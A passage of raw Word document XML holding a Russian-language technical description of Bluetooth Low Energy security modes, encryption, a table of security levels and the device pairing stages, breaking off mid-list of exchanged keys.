      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">BLE предлагает несколько сервисов безопасности для защиты данных, передаваемых между парой соединенных устройств. Большинство из поддерживаемых сервисов могут быть описаны в терминах двух режимов: LE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 1 и LE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> 2. Эти режимы обеспечивают сервисы безопасности на канальном уровне и уровне ATT, соответственно .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Канальный уровень BLE поддерживает шифрование и аутентификацию на основе алгоритма </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Cipher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Block</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Chaining-Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (CCM) и блочного шифра AES-128. При использовании в соединении шифрования и аутентификации, к полезной нагрузке (PDU) добавляется четырехбайтное сообщение проверки целостности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Integrity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Check</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (MIC), после чего поля PDU и MIC шифруются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Также возможна передача </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>аутентификационных</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> данных поверх нешифрованного соединения канального уровня. В данном случае на уровне ATT к полезной нагрузке добавляется 12-байтная сигнатура. Сигнатура вычисляется путем использования алгоритма AES-128 как блочного шифра. Одним входом алгоритма является счетчик, позволяющий предотвратить атаки типа повтора сообщений. Если приемнику удается верифицировать сообщение, считается, что оно пришло от достоверного источника.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>В дополнение к описанным сервисам, BLE поддерживает механизм, называемый приватным (или частным) адресом, который позволяет устройству использовать множество часто меняемых адресов. Этот механизм снижает угрозу отслеживания BLE-устройства по его адресу. Приватные адреса генерируются на основе публичного адреса устройства путем его шифрования с использованием ключа, полученного от доверенного устройства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="00A924A9" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Каждый режим безопасности предусматривает наличие нескольких уровней, применяемых в зависимости от типа соединения пары устройств (таблица </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00A924A9" w:rsidRPr="00A924A9">
        <w:t>[24]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10217" w:type="dxa"/>
        <w:tblInd w:w="-434" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="920"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1963"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="1431"/>
        <w:gridCol w:w="2312"/>
      </w:tblGrid>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920"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Режим</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>безопасности</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Тип</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>соединения</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:br/>
              <w:t>(Pairing)</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Шифрование</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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Проверка</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>целостности</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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C07525">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t>Уровень стека</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:vMerge w:val="restar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r w:rsidRPr="000C799E">
              <w:t>LE Security Mode 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963"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Нет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="179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Нет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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Нет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
            <w:vMerge w:val="restar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C07525">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t>Канальный уровень (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>Link</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>Layer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:vMerge/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="000C799E">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963"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Без</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>аутентификации</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="179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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:vMerge/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="000C799E">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963"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Аутентификация</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="179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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:vMerge w:val="restar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r w:rsidRPr="000C799E">
              <w:t>LE Security Mode 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963"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Без</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>аутентификации</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="179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Нет</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="143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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2312" w:type="dxa"/>
            <w:vMerge w:val="restar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C07525">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C799E">
              <w:t>Уровень ATT</w:t>
            </w:r>
            <w:r w:rsidRPr="000C799E">
              <w:br/>
              <w:t xml:space="preserve">(ATT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>Layer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C799E" w:rsidRPr="00D91A39" w:rsidTr="000C799E">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="920" w:type="dxa"/>
            <w:vMerge/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="000C799E">
            <w:pPr>
              <w:pStyle w:val="ae"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Уровень</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C799E">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963"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Аутентификация</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="179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Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1431" w:type="dxa"/>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D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="000C799E">
            <w:pPr>
              <w:pStyle w:val="ae"/>
              <w:rPr>
                <w:szCs w:val="23"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C799E">
              <w:t>Есть</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D91A39" w:rsidRPr="00D91A39" w:rsidRDefault="00D91A39" w:rsidP="00C07525"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003A6F8A" w:rsidRPr="000C799E" w:rsidRDefault="000C799E" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="00A66CA1">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91A39">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t>Сервисы и уровни безопасности, определенные в стеке протоколов BLE</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C799E">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6F8A" w:rsidRPr="000C799E" w:rsidRDefault="003A6F8A" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="000C799E">
        <w:t>Сопряжение устройств</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD6675" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Логическое соединение устройств (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>pairing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>) происходит в три этапа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> На первом этапе соединенные на канальном уровне устройства объявляют свои доступные возможности ввода-вывода, и на основе их принимается решение о методе взаимодействия на втором этапе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>Целью второго этапа является генерация короткоживущего ключа (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Short-Term</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t> — STK), который будет использован на третьем этапе для обеспечения безопасности передачи распространения ключевой информации. На втором этапе устройства первоначально договариваются о временном ключе (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Temporary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t> — TK) при помощи одного из методов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Band</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Passkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Just</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Works</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">Метод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Band</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (передача вне полосы) предполагает передачу временного ключа по альтернативным каналам, например, используя NFC. В методе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Passkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Entry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> ключ задает пользователь в виде последовательности из шести цифр. Когда применение обоих методов невозможно, используется метод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Just</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Work</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>, хотя он не поддерживает проверку аутентификаций, и не защищен от атаки типа «посредник» (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Man</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Middle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t> — MITM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="000C799E" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t>На базе ключа ТК и случайных чисел, генерируемых каждым из узлов, создается STK, что является завершением второго этапа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91A39" w:rsidRPr="00A924A9" w:rsidRDefault="00D91A39" w:rsidP="00C07525">
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve">На третьем этапе каждая из конечных точек соединения может передать другой конечной точке до трех 128-битных ключей, называемых </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>Long-Term</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> (LTK), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Connection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Signature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C799E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C799E">
        <w:t>Resolving</w:t>
